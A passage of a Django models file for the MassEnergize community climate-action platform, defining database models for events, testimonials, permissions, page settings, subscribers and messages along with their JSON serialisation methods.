        # rescheduled_event is nullable, so only report its times when it exists
        if self.rescheduled_event:
            data["rescheduled_start_time"] = str(
                self.rescheduled_event.start_date_and_time
            )
            data["rescheduled_end_time"] = str(
                self.rescheduled_event.end_date_and_time
            )
        return data


class EventAttendee(models.Model):
    """
    A class used to represent events and attendees

    Attributes
    ----------
    user : Foreign Key of the User
      Which user this applies to
    status: str
      Tells if the user is just interested, RSVP-ed or saved for later.
    event: int
      Foreign Key to event that the user has responded to.
    """

    id = models.AutoField(primary_key=True)
    user = models.ForeignKey(UserProfile, on_delete=models.CASCADE)
    event = models.ForeignKey(Event, on_delete=models.CASCADE)
    status = models.CharField(
        max_length=TINY_STR_LEN, choices=CHOICES.get("EVENT_CHOICES", {}).items()
    )
    updated_at = models.DateTimeField(auto_now=True)
    is_deleted = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return "%s | %s | %s" % (self.user, self.status, self.event)

    def simple_json(self):
        data = model_to_dict(self, ["id", "status"])
        data["user"] = self.user.info()
        data["event"] = self.event.info()
        return data

    def full_json(self):
        return self.simple_json()

    class Meta:
        verbose_name_plural = "Event Attendees"
        db_table = "event_attendees"
        unique_together = [["user", "event"]]


class Permission(models.Model):
    """
    A class used to represent Permission(s) that are required by users to perform
    any tasks on this platform.

    Attributes
    ----------
    name : str
      name of the permission
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(
        max_length=TINY_STR_LEN,
        choices=CHOICES.get("PERMISSION_TYPES", {}).items(),
        db_index=True,
    )
    description = models.TextField(max_length=LONG_STR_LEN, blank=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return CHOICES.get("PERMISSION_TYPES", {})[self.name]

    def simple_json(self):
        return model_to_dict(self)

    def full_json(self):
        return self.simple_json()

    class Meta:
        ordering = ("name",)
        db_table = "permissions"


class UserPermissions(models.Model):
    """
    A class used to represent Users and what they can do.
Attributes ---------- who : int the user on this site can_do: int Foreign Key desscribing the policy that they can perform """ id = models.AutoField(primary_key=True) who = models.ForeignKey(Role, on_delete=models.CASCADE) can_do = models.ForeignKey(Permission, on_delete=models.CASCADE) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "(%s) can (%s)" % (self.who, self.can_do) def simple_json(self): return { "id": self.id, "who": get_json_if_not_none(self.who), "can_do": get_json_if_not_none(self.can_do), } def full_json(self): return self.simple_json() class Meta: ordering = ("who",) db_table = "user_permissions" class Testimonial(models.Model): """ A class used to represent a Testimonial shared by a user. Attributes ---------- title : str title of the testimony body: str (HTML) more information for this testimony. is_approved: boolean after the community admin reviews this, he can check the box """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=SHORT_STR_LEN, db_index=True) body = models.TextField(max_length=LONG_STR_LEN) is_approved = models.BooleanField(default=False, blank=True) tags = models.ManyToManyField(Tag, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="testimonials", ) user = models.ForeignKey( UserProfile, on_delete=models.CASCADE, db_index=True, null=True ) action = models.ForeignKey( Action, on_delete=models.CASCADE, null=True, db_index=True ) vendor = models.ForeignKey( Vendor, on_delete=models.SET_NULL, null=True, blank=True, db_index=True ) community = models.ForeignKey( Community, on_delete=models.CASCADE, blank=True, null=True, db_index=True ) rank = models.PositiveSmallIntegerField(default=0) created_at = models.DateTimeField(auto_now_add=True, blank=True) updated_at = models.DateTimeField(auto_now=True, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) anonymous = models.BooleanField(default=False, blank=True) preferred_name = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) other_vendor = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) def __str__(self): return self.title def info(self): return model_to_dict(self, fields=["id", "title", "community"]) def _get_user_info(self): return get_json_if_not_none(self.user) or { "full_name": "User unknown", "email": "e-mail address not provided", } def simple_json(self): res = model_to_dict(self, exclude=["image", "tags"]) res["user"] = self._get_user_info() res["action"] = get_json_if_not_none(self.action) res["vendor"] = None if not self.vendor else self.vendor.info() res["community"] = get_json_if_not_none(self.community) res["created_at"] = self.created_at.date() res["file"] = get_json_if_not_none(self.image) res["tags"] = [t.simple_json() for t in self.tags.all()] res["anonymous"] = self.anonymous res["preferred_name"] = self.preferred_name res["other_vendor"] = self.other_vendor return res def full_json(self): data = self.simple_json() data["image"] = data.get("file", None) data["tags"] = [t.simple_json() for t in self.tags.all()] return data class Meta: ordering = ("rank",) db_table = "testimonials" class UserActionRel(models.Model): """ A class used to represent a user and his/her relationship with an action. 
Whether they marked an action as todo, done, etc Attributes ---------- user : int Foreign Key for user real_estate_unit: Foreign key for the real estate unit this action is related to. action: int which action they marked vendor: which vendor they choose to contact/connect with status: Whether they marked it as todo, done or save for later date_completed: If specified, the date when they completed the action carbon_impact: Carbon reduction calculated by the Carbon Calculator """ id = models.AutoField(primary_key=True) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE, db_index=True) real_estate_unit = models.ForeignKey(RealEstateUnit, on_delete=models.CASCADE) action = models.ForeignKey(Action, on_delete=models.CASCADE) vendor = models.ForeignKey(Vendor, on_delete=models.SET_NULL, null=True, blank=True) status = models.CharField( max_length=SHORT_STR_LEN, choices=CHOICES.get("USER_ACTION_STATUS", {}).items(), db_index=True, default="TODO", ) date_completed = models.DateField(blank=True, null=True) carbon_impact = models.IntegerField( default=0 ) # that which was calculated by the Carbon Calculator created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def simple_json(self): return { "id": self.id, "user": get_json_if_not_none(self.user), "action": get_json_if_not_none(self.action), "real_estate_unit": get_json_if_not_none(self.real_estate_unit), "status": self.status, "date_completed": self.date_completed, "carbon_impact": self.carbon_impact, } def full_json(self): res = self.simple_json() res["vendor"] = get_json_if_not_none(self.vendor) return res def __str__(self): return "%s | %s | (%s)" % (self.user, self.status, self.action) class Meta: ordering = ("status", "user", "action") unique_together = [["user", "action", "real_estate_unit"]] class CommunityAdminGroup(models.Model): """ This represents a binding of a group of users and a community for which they are admin for. Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, blank=True) members = models.ManyToManyField(UserProfile, blank=True) is_deleted = models.BooleanField(default=False, blank=True) pending_admins = models.JSONField(blank=True, null=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self, exclude=["members"]) res["community"] = get_json_if_not_none(self.community) res["members"] = [m.simple_json() for m in self.members.all()] return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "community_admin_group" class UserGroup(models.Model): """ This represents a binding of a group of users and a community and the permissions they have. 
Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey( Community, on_delete=models.CASCADE, blank=True, db_index=True ) members = models.ManyToManyField(UserProfile, blank=True) permissions = models.ManyToManyField(Permission, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self, exclude=["members", "permissions"]) def full_json(self): data = self.simple_json() data["community"] = get_json_if_not_none(self.community) data["members"] = [m.simple_json() for m in self.members.all()] data["permissions"] = [p.simple_json() for p in self.permissions.all()] return data class Meta: ordering = ("name",) db_table = "user_groups" class Data(models.Model): """Instances of data points Attributes ---------- name : str name of the statistic value: decimal The value of the statistic goes here info: JSON dynamic information goes in here. The symbol and other info goes here community: int foreign key linking a community to this statistic """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, db_index=True) value = models.PositiveIntegerField(default=0) reported_value = models.PositiveIntegerField(default=0) denominator = models.CharField(max_length=SHORT_STR_LEN, blank=True) symbol = models.CharField(max_length=LONG_STR_LEN, blank=True) tag = models.ForeignKey( Tag, blank=True, on_delete=models.CASCADE, null=True, db_index=True ) community = models.ForeignKey( Community, blank=True, on_delete=models.SET_NULL, null=True, db_index=True ) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return "%s | %s (%d) |(%s)" % (self.community, self.name, self.value, self.tag) def simple_json(self): return model_to_dict(self, fields=["id", "name", "value", "reported_value"]) def full_json(self): data = self.simple_json() data["tag"] = get_json_if_not_none(self.tag) data["community"] = get_json_if_not_none(self.community) return data class Meta: verbose_name_plural = "Data" ordering = ("name", "value") db_table = "data" class Graph(models.Model): """Instances keep track of a statistic from the admin Attributes ---------- title : str the title of this graph type: str the type of graph to be plotted eg. 
pie chart, bar chart etc data: JSON data to be plotted on this graph """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=LONG_STR_LEN, db_index=True) graph_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("GRAPH_TYPES", {}).items() ) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, blank=True ) data = models.ManyToManyField(Data, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def simple_json(self): return model_to_dict(self, fields=["title", "community", "is_published"]) def full_json(self): res = self.simple_json() res["data"] = [d.simple_json() for d in self.data.all()] return res def __str__(self): return self.title class Meta: verbose_name_plural = "Graphs" ordering = ("title",) class Button(models.Model): """Buttons on the pages""" text = models.CharField(max_length=SHORT_STR_LEN, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) url = models.CharField(max_length=SHORT_STR_LEN, blank=True) color = models.CharField(max_length=SHORT_STR_LEN, blank=True) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return self.text def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("text",) class SliderImage(models.Model): """Model the represents the database for Images that will be inserted into slide shows Attributes ---------- title : str title of the page section subtitle: str sub title for this image as should appear on the slider buttons: JSON a json list of buttons with each containing text, link, icon, color etc """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True, db_index=True) subtitle = models.CharField(max_length=LONG_STR_LEN, blank=True) image = models.ForeignKey(Media, on_delete=models.SET_NULL, null=True, blank=True) buttons = models.ManyToManyField(Button, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.title def simple_json(self): return { "id": self.id, "title": self.title, "image": get_json_if_not_none(self.image), } def full_json(self): res = self.simple_json() res["buttons"] = [b.simple_json() for b in self.buttons.all()] return res class Meta: verbose_name_plural = "Slider Images" db_table = "slider_images" class Slider(models.Model): """ Model that represents a model for a slider/carousel on the website Attributes ---------- name : str name of the page section description: str a description of this slider info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, blank=True, db_index=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) slides = models.ManyToManyField(SliderImage, blank=True) is_global = models.BooleanField(default=False, blank=True) community = models.ForeignKey( Community, on_delete=models.CASCADE, null=True, blank=True ) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return { "id": self.id, "name": self.name, "description": self.description, } def full_json(self): res = self.simple_json() res["slides"] = [s.full_json() for s in 
self.slides.all()]
        return res


class Menu(models.Model):
    """Represents items on the menu/navigation bar (top-most bar on the webpage)

    Attributes
    ----------
    name : str
      name of the menu
    content: JSON
      the content is represented as a json
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=LONG_STR_LEN, unique=True)
    content = models.JSONField(blank=True, null=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return self.name

    def simple_json(self):
        return model_to_dict(self)

    def full_json(self):
        return self.simple_json()

    class Meta:
        ordering = ("name",)


class Card(models.Model):
    """Cards on the pages"""

    title = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    description = models.TextField(max_length=LONG_STR_LEN, blank=True)
    icon = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    link = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    media = models.ForeignKey(Media, blank=True, on_delete=models.SET_NULL, null=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=True)

    def __str__(self):
        return self.title

    def simple_json(self):
        return {
            "title": self.title,
            "description": self.description,
            "icon": self.icon,
            "link": self.link,
            "media": get_json_if_not_none(self.media),
        }

    def full_json(self):
        return self.simple_json()

    class Meta:
        ordering = ("title",)


class PageSection(models.Model):
    """
    A class used to represent a PageSection
    #TODO: what about page sections like a gallery, slideshow, etc?

    Attributes
    ----------
    name : str
      name of the page section
    info: JSON
      dynamic information goes in here
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=SHORT_STR_LEN)
    title = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    description = models.TextField(max_length=LONG_STR_LEN, blank=True)
    image = models.ForeignKey(Media, on_delete=models.SET_NULL, null=True, blank=True)
    cards = models.ManyToManyField(Card, blank=True)
    buttons = models.ManyToManyField(Button, blank=True)
    slider = models.ForeignKey(Slider, on_delete=models.SET_NULL, null=True, blank=True)
    graphs = models.ManyToManyField(Graph, blank=True, related_name="graphs")
    info = models.JSONField(blank=True, null=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return self.name

    def simple_json(self):
        return model_to_dict(self, ["id", "name", "title", "description"])

    def full_json(self):
        res = self.simple_json()
        res["image"] = get_json_if_not_none(self.image)
        res["cards"] = [c.simple_json() for c in self.cards.all()]
        res["buttons"] = [b.simple_json() for b in self.buttons.all()]
        res["slider"] = get_json_if_not_none(self.slider, True)
        res["graphs"] = [g.full_json() for g in self.graphs.all()]
        res["info"] = self.info
        return res


class Page(models.Model):
    """
    A class used to represent a Page on a community portal eg. The home page,
    about-us page, etc

    Attributes
    ----------
    title : str
      title of the page
    description: str
      the description of the page
    community: int
      Foreign key for which community this page is linked to
    sections: ManyToMany
      all the different parts/sections that go on this page
    content: JSON
      dynamic info for this page goes here.
""" id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) sections = models.ManyToManyField(PageSection, blank=True) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.name} - {self.community.name}" def simple_json(self): res = model_to_dict(self, ["id", "name", "description"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["sections"] = [s.full_json() for s in self.sections.all()] res["info"] = self.info return res class Meta: unique_together = [["name", "community"]] class BillingStatement(models.Model): """ A class used to represent a Billing Statement Attributes ---------- name : str name of the statement. amount: decimal the amount of money owed description: the breakdown of the bill for this community community: int Foreign Key to the community to whom this bill is associated. start_date: Datetime the start date from which the charges were incurred end_date: the end date up to which this charge was incurred. more_info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) amount = models.CharField(max_length=SHORT_STR_LEN, default="0.0") description = models.TextField(max_length=LONG_STR_LEN, blank=True) start_date = models.DateTimeField(blank=True, db_index=True) end_date = models.DateTimeField(blank=True) more_info = models.JSONField(blank=True, null=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, db_index=True ) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self, exclude=["community"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "billing_statements" class Subscriber(models.Model): """ A class used to represent a subscriber / someone who wants to join the massenergize mailist Attributes ---------- name : str name of the statement. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) email = models.EmailField(blank=False, db_index=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, db_index=True ) created_at = models.DateTimeField(auto_now_add=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self) res["community"] = None if not self.community else self.community.info() return res def full_json(self): return self.simple_json() class Meta: db_table = "subscribers" unique_together = [["email", "community"]] class EmailCategory(models.Model): """ A class tha represents an email preference that a user or subscriber can subscribe to. 
Attributes ---------- name : str the name for this email preference community: int Foreign Key to the community this email category is associated with is_global: boolean True if this email category should appear in all the communities """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, db_index=True) community = models.ForeignKey(Community, db_index=True, on_delete=models.CASCADE) is_global = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): res = self.simple_json() res["community"] = get_json_if_not_none(self.community) return res class Meta: db_table = "email_categories" unique_together = [["name", "community"]] verbose_name_plural = "Email Categories" class SubscriberEmailPreference(models.Model): """ Represents the email preferences of each subscriber. For a subscriber might want marketing emails but not promotion emails etc Attributes ---------- subscriber: int Foreign Key to a subscriber email_category: int Foreign key to an email category """ id = models.AutoField(primary_key=True) subscriber = models.ForeignKey(Subscriber, on_delete=models.CASCADE, db_index=True) subscribed_to = models.ForeignKey(EmailCategory, on_delete=models.CASCADE) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "%s - %s" % (self.subscriber, self.subscribed_to) def simple_json(self): return { "id": self.id, "subscriber": get_json_if_not_none(self.subscriber), "subscribed_to": get_json_if_not_none(self.subscribed_to), } def full_json(self): return self.simple_json() class Meta: db_table = "subscriber_email_preferences" class PageSettings(models.Model): """ Represents the basic page settings. This is a base class, which contains common attributes to most page settings. 
Attributes ---------- Community: Foreign key: Which community this applies to title: str Title of the page (if different than default) sub_title: str Sub-title or tag-line of the page (if different than default) description: str Description of the page (if different than default) images: ForeignKeys: Links to one or more Media records featured_video_link: str A link to a featured video (on YouTube or elsewhere) more_info: JSON - extraneous information is_deleted: boolean - whether this page was deleted from the platform (perhaps with it's community) is_published: boolean - whether this page is live is_template: boolean - whether this is a template to be copied """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res class Meta: abstract = True class HomePageSettings(models.Model): """ Represents the community's Home page settings. Attributes ---------- Community: Foreign key: Which community this applies to title: str Title of the page (if different than default) sub_title: str Sub-title or tag-line of the page (if different than default) description: str Description of the page (if different than default) images: ForeignKeys: Links to one or more Media records featured_video_link: str A link to a featured video (on YouTube or elsewhere) specific to home page: ---------------------- featured_links : JSON - links to page redirects for the big buttons featured_events : links to one or more Event records featured_stats : lins to one or more Data records show_featured_events : boolean - whether to show featured events section show_featured_stats : boolean - whether to show featured stats section show_featured_links : boolean - whether to show featured links section show_featured_video : boolean - whether to show featured video featured_stats_description : str - descriptive text on what the stats are about featured_events_description : str - descriptive text on the featured events specific to the footer on all pages: ------------------------------------ show_footer_subscribe : Boolean - whether to show newsletter subscribe box show_footer_social_media : Boolean - whether to show footer social media icons social_media_links: str Links to social media, such as: ["facebook:www.facebook.com/coolerconcord/,instgram:www.instagram.com/coolerconcord/"] more_info: JSON - extraneous information is_deleted: boolean - whether this page was deleted from the platform (perhaps with it's community) is_published: boolean - whether this page is live is_template: boolean - whether this is a template to be copied """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = 
models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, related_name="homepage_images", blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_links = models.JSONField(blank=True, null=True) featured_events = models.ManyToManyField(Event, blank=True) featured_stats = models.ManyToManyField(Data, blank=True) show_featured_events = models.BooleanField(default=True, blank=True) show_featured_stats = models.BooleanField(default=True, blank=True) show_featured_links = models.BooleanField(default=True, blank=True) show_featured_video = models.BooleanField(default=False, blank=True) featured_stats_subtitle = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_stats_description = models.CharField(max_length=LONG_STR_LEN, blank=True) featured_events_subtitle = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_events_description = models.CharField(max_length=LONG_STR_LEN, blank=True) show_footer_subscribe = models.BooleanField(default=True, blank=True) show_footer_social_media = models.BooleanField(default=True, blank=True) social_media_links = models.JSONField(blank=True, null=True) is_template = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return "HomePageSettings - %s" % (self.community) def simple_json(self): res = model_to_dict( self, exclude=["images", "featured_events", "featured_stats"] ) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] res["community"] = get_json_if_not_none(self.community) res["featured_events"] = [i.simple_json() for i in self.featured_events.all()] res["featured_stats"] = [i.simple_json() for i in self.featured_stats.all()] return res class Meta: db_table = "home_page_settings" verbose_name_plural = "HomePageSettings" class ActionsPageSettings(models.Model): """ Represents the community's Actions page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ActionsPageSettings - %s" % (self.community) class Meta: db_table = "actions_page_settings" verbose_name_plural = "ActionsPageSettings" class ContactUsPageSettings(models.Model): """ Represents the community's ContactUs page settings. 
Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ContactUsPageSettings - %s" % (self.community) class Meta: db_table = "contact_us_page_settings" verbose_name_plural = "ContactUsPageSettings" class DonatePageSettings(models.Model): """ Represents the communities Donate page settings. Attributes ---------- see description under PageSettings one additional field: donation_link : str - link to donation url (if not contained within the HTML description) """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) donation_link = models.CharField(max_length=LONG_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "DonatePageSettings - %s" % (self.community) class Meta: db_table = "donate_page_settings" verbose_name_plural = "DonatePageSettings" class AboutUsPageSettings(models.Model): """ Represents the community's AboutUs page settings. 
Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) # image = models.ForeignKey(Media, blank=True, null=True, on_delete=models.SET_NULL) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() # res['images'] = [i.simple_json() for i in self.images.all()] res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "AboutUsPageSettings - %s" % (self.community) class Meta: db_table = "about_us_page_settings" verbose_name_plural = "AboutUsPageSettings" class ImpactPageSettings(models.Model): """ Represents the community's Impact page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ImpactPageSettings - %s" % (self.community) class Meta: db_table = "impact_page_settings" verbose_name_plural = "ImpactPageSettings" class TeamsPageSettings(PageSettings): """ Represents the community's Teams page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "TeamsPageSettings - %s" % (self.community) class Meta: db_table = "teams_page_settings" verbose_name_plural = "TeamsPageSettings" class VendorsPageSettings(PageSettings): """ Represents the community's Vendors page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "VendorsPageSettings - %s" % (self.community) class Meta: db_table = "vendors_page_settings" verbose_name_plural = "VendorsPageSettings" class EventsPageSettings(PageSettings): """ Represents the community's Events page settings. 
Attributes ---------- see description under PageSettings """ def __str__(self): return "EventsPageSettings - %s" % (self.community) class Meta: db_table = "events_page_settings" verbose_name_plural = "EventsPageSettings" class TestimonialsPageSettings(PageSettings): """ Represents the community's Testimonials page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "TestimonialsPageSettings - %s" % (self.community) class Meta: db_table = "testimonials_page_settings" verbose_name_plural = "TestimonialsPageSettings" class RegisterPageSettings(PageSettings): """ Represents the community's Registration page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "RegisterPageSettings - %s" % (self.community) class Meta: db_table = "register_page_settings" verbose_name_plural = "RegisterPageSettings" class SigninPageSettings(PageSettings): """ Represents the community's Signin page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "SigninPageSettings - %s" % (self.community) class Meta: db_table = "signin_page_settings" verbose_name_plural = "SigninPageSettings" class Message(models.Model): """ A class used to represent a Message sent on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) user_name = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) title = models.CharField(max_length=SHORT_STR_LEN) uploaded_file = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL ) email = models.EmailField(blank=True) user = models.ForeignKey( UserProfile, on_delete=models.SET_NULL, null=True, blank=True ) body = models.TextField(max_length=LONG_STR_LEN) community = models.ForeignKey( Community, blank=True, on_delete=models.SET_NULL, null=True ) team = models.ForeignKey(Team, blank=True, on_delete=models.SET_NULL, null=True) have_replied = models.BooleanField(default=False, blank=True) have_forwarded = models.BooleanField(default=False, blank=True) is_team_admin_message = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) archive = models.BooleanField(default=False, blank=True) starred = models.BooleanField(default=False, blank=True) response = models.CharField(max_length=LONG_STR_LEN, blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True, null=True) def __str__(self): return f"{self.title}" def simple_json(self): res = model_to_dict(self) res["community"] = get_summary_info(self.community) res["team"] = get_summary_info(self.team) res["user"] = get_summary_info(self.user) res["created_at"] = self.created_at.strftime("%Y-%m-%d %H:%M") return res def full_json(self): res = self.simple_json() res["uploaded_file"] 